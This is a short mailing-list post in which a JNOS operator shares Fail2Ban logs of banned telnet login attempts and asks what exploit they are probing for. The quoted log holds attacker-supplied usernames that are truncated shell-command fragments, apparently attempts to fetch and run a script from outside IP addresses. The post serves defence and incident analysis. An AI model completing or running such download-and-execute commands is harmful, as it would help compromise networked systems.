For those who monitor their logs, I've seen a spike in hack attempts to login to my JNOS via telnet, only there is something odd regarding the username they're using when trying to login.
I'm using Fail2Ban in combination with Shorewall, and my Fail2Ban jail rule caught these.
(Note the odd login names used in parenthesis below .)
======================= [Fail2Ban] jnos: banned 124.107.194.191 Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
[Fail2Ban] jnos: banned 119.93.93.191 Mon Jun 13 15:18:40 2016 119.93.93.191:43376 - MBOX (root) bad login Mon Jun 13 15:18:41 2016 119.93.93.191:43376 - MBOX (46.183.217.145 -c ge) bad login
[Fail2Ban] jnos: banned 181.120.124.254 Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login
[Fail2Ban] jnos: banned 119.92.147.216 Tue Jun 14 16:46:50 2016 119.92.147.216:49692 - MBOX (root) bad login Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login
[Fail2Ban] jnos: banned 119.93.93.103 Tue Jun 14 19:44:39 2016 119.93.93.103:50702 - MBOX (root) bad login Tue Jun 14 19:44:43 2016 119.93.93.103:50702 - MBOX (08.67.1.175 -c get t) bad login ==========================
Anyone know what exploit someone is trying to probe for when using a login name like "n2.sh -g 185.103.109" ??
Just curious if anyone knows the exact intent of what they're trying to exploit so I can research and reinforce as needed.
I suspect this is happening 44 system wide to those with telnet options.
Bill Lewis - KG6BAJ
--- This email has been checked for viruses by Avast antivirus software. https://www.avast.com/antivirus